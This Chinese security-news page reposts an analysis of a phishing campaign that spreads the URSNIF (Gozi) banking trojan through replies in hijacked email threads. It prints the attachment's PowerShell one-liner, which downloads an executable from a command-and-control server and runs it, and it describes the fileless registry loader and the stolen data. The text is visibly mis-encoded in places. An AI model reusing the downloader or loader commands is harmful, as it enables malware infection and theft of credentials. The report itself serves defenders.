<dl id="wqg5j"></dl>

    1. <menuitem id="wqg5j"></menuitem>

      <dl id="wqg5j"><font id="wqg5j"></font></dl>
    2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
    3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
      <li id="wqg5j"><ins id="wqg5j"></ins></li>
      安基网 首页 资讯 安全报 查看内容

      网络钓鱼新手段£º通过回复电子邮件来传播URSNIF银行木马

      2018-10-11 12:41| 投稿: lofor |来自: 互联网


      免责声明£º本站系公益性非盈利IT技术普及网£¬本文由投稿者转载自互联网的公开文章£¬文末均已注明出处£¬其内容和?#35745;?#29256;权归原网站或作者所有£¬文中所述不代表本站观点£¬若有无意侵权或转载不当之处请从网站右下角联系我们处理£¬谢谢合作£¡

      摘要: 来自网络安全公司趋势科技£¨Trend Micro£©的Erika Mendoza¡¢Anjali Patil和Jay Yaneza在本周二通过一篇博文向我们介绍了一种新的网络钓鱼手段£¬而攻击者的最终目的是向受害者传播知名的银行木马URSNIF£¨也被称为Gozi ...

      来自网络安全公司趋势科技£¨Trend Micro£©的Erika Mendoza¡¢Anjali Patil和Jay Yaneza在本周二通过一篇博文向我们介绍了一种新的网络钓鱼手段£¬而攻击者的最终目的是向受害者传播知名的银行木马URSNIF£¨也被称为Gozi£¬最早出现于2007年£¬并一?#34987;?#36291;于金融行业£©¡£

      根据这篇博文的描述£¬大多数网络钓鱼活动在本质上都很简单£¬并且很容易被发现¡ª¡ª通常涉及到发送看似合法的电子邮件£¬并在文本中嵌入恶意附件或链接¡£但是£¬趋势科技在9月份观察到的垃圾电子邮件活动表明£¬攻击者正倾向于另一种更复杂的网络钓鱼?#38382;½¡?/p>

      在这起活动中£¬攻击者并没有利用虚假的电子邮箱账户来新建并发送电子邮件¡£相反£¬他们使用了被劫持的账户£¬并将恶意软件放在了对原始电子邮件的回复中¡£由于这些电子邮件原本是合法的£¬而消息只是作为了?#20013;?#20250;话的一部分£¬因此这种特殊的手段往往十分棘手和难以察觉¡£

      从趋势科技目前收集到的所有数据来看£¬这场活动主要集中在北美和?#20998;Þ£?#20165;有少数波及到?#20405;?#21644;拉丁美洲¡£另外£¬这场活动主要针对的是与教育¡¢金融和能源相关的机构£¬但也涉及到其他一些行业和机构£¬包括房地产¡¢交通¡¢制造业和政府¡£

      分析钓鱼电子邮件样本

      为了便于大家理解£¬我们在这里将展示由趋势科技提供的一个钓鱼电子邮件样本£¬如下图所示£º

      图1.用于回复会话的恶意电子邮件样本

      由于电子邮件的发件人是收件人所熟悉的人£¬并且消息也是会话的一部分£¬因此收件人很容易相信这只是对原电子邮件的一个回复¡£?#36865;â£?#20027;题和语法似乎都是正确的£¬并且在电子邮件的末尾甚至还有签名¡£

      然而£¬如果仔细检查?#31361;?#21457;现电子邮件中存在一些可疑的地方¡£其中£¬最明显的差异是语言从法语到英语的变化¡£?#36865;â£?#24694;意电子邮件中的签名与合法电子邮件中的签名是不同的¡£最后£¬回复是通用的£¬这就导致它可能与主题毫无关联¡£虽然这并不意味着电子邮件就是恶意的£¬但至少给了我们一个危?#25307;?#21495;¡£最重要的是£¬这些细小的?#38468;?#20045;一看可能很难发现£¬特别是对于那些每天都会查阅大量电子邮件的人来说¡£

      图2.恶意电子邮件与合法电子邮件之间的对比

      分析恶意软件?#34892;?#36733;荷

      如果收件人双击了电子邮件中的恶意.doc附件£¬那?#27492;?#23558;调用PowerShell?#29992;?#20196;和控制£¨C£¦C£©服务器下载最新版本的URSNIF恶意软件£¬然后执行下载的文件£º

      powershell $VWc=new-object Net.WebClient;$wIt=¡¯http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn¡¯.Split(¡®@¡¯);$jzK = ¡®369¡¯;$Aiz=$env:public+¡¯\¡¯+$jzK+¡¯.exe¡¯;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}

      这个文件将充当恶意软件的主加载程序¡£在执行其例程之前£¬它将首先检查操作系统版本¡£这是由于它只会在Microsoft操作系统?#29616;?#34892;£¬尤其是Windows Vista及其后续版本¡£另一方面£¬它还会主动规避某些语言环?#24120;?#22914;CN和RU¡£

      主加载程序管理整个执行过程£¬并将事件记录在文本文件中£º

      %User Temp%\{temp filename}.bin

      图3.恶意软件加载程序的日志

      主加载程序还将从C£¦C服务器下载其他模块£¬并将它们保存在注册表文件夹HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中¡£

      下图展示的是主加载程序创建的注册表项和包含脚本和二进制文件的条目¡£

      图4.注册表项和包含脚本和二进制文件的条目

      请注意£¬虽然这些注册表项和一些注册表项名称会因计算机不同而存在差异£¬但位置始终位于HKCU\Software\AppDataLow\Software\Microsoft\¡£

      在下载组件之后£¬主加载程序将执行存储在comsxRes£¨此名称可能不同£©中的Powershell脚本¡£下面的命令行指令展示了如何调用注册表中的十六进制值¡£

      exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ¡®HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4¡¯).comsxRes

      图5. comsxRes的十六进制值

      当此脚本加载存储在注册表中的嵌入式二进制文件?#20445;?#26080;文件执行就开始了¡£在下图中£¬趋势科技用¡°¨C{hex-encoded binary}¡ª¡±替换了二进制数据£¬以显示整段代码¡£脚本是采用base64编码的£¬以下是解码后的结果£º

      图6.存储在注册表中的嵌入式二进制文件的代码

      它将在创建的注册表项中搜索Client32或Client64£¬并将此代码注入explorer.exe以建立持久性¡£注册表中的其他条目在其后续例程中是必不可少的£¬因为这些条目稍后将在注入的恶意软件代码中引用¡£例如£¬¡°TorClient¡±条目用于恶意软件通过TOR网络与其C£¦C服务器通信¡£

      分析被窃取的信息

      最终的?#34892;?#36733;荷是一个名为Client32或Client64的DLL文件£¬具体取决于主机的体系结构¡£?#34892;?#36733;荷的主要目标是执行信息窃取£¬具体包括以下信息£º

      • 系统信息
      • 已安装的应用程序列表
      • 已安装的驱动程序列表
      • 正在运行的进程列表
      • 网络设备列表
      • 外部IP地址
      • 电子邮箱凭证£¨IMAP¡¢POP3¡¢SMTP£©
      • Cookies
      • 证书

      ?#36865;â£?#23427;还可以录制屏幕£¨.AVI£©£¬以及通过webinjects窃取财务信息¡£

       

      本文由 黑客视界 综合网络整理£¬?#35745;?#28304;自网络£»转载请注明¡°转自黑客视界?#20445;?#24182;附上链接¡£


      Tag标签:

      小编推荐£º欲学习电脑技术¡¢系统维护¡¢网络管理¡¢编程开发和安全攻防等高端IT技术£¬请 点击这里 注册账号£¬公开课频道价值万元IT培训教程免费学£¬让您少走弯路¡¢事半功倍£¬好工作升职?#26377;„¦?/font>



      免责声明£º本站系公益性非盈利IT技术普及网£¬本文由投稿者转载自互联网的公开文章£¬文末均已注明出处£¬其内容和?#35745;?#29256;权归原网站或作者所有£¬文中所述不代表本站观点£¬若有无意侵权或转载不当之处请从网站右下角联系我们处理£¬谢谢合作£¡


      鲜花

      握手

      雷人

      路过

      鸡蛋

      相关阅读

      最新评论

       最新
      返回顶部
      Ðþ»úͼ
      <dl id="wqg5j"></dl>

        1. <menuitem id="wqg5j"></menuitem>

          <dl id="wqg5j"><font id="wqg5j"></font></dl>
        2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
        3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
          <li id="wqg5j"><ins id="wqg5j"></ins></li>
          <dl id="wqg5j"></dl>

            1. <menuitem id="wqg5j"></menuitem>

              <dl id="wqg5j"><font id="wqg5j"></font></dl>
            2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
            3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
              <li id="wqg5j"><ins id="wqg5j"></ins></li>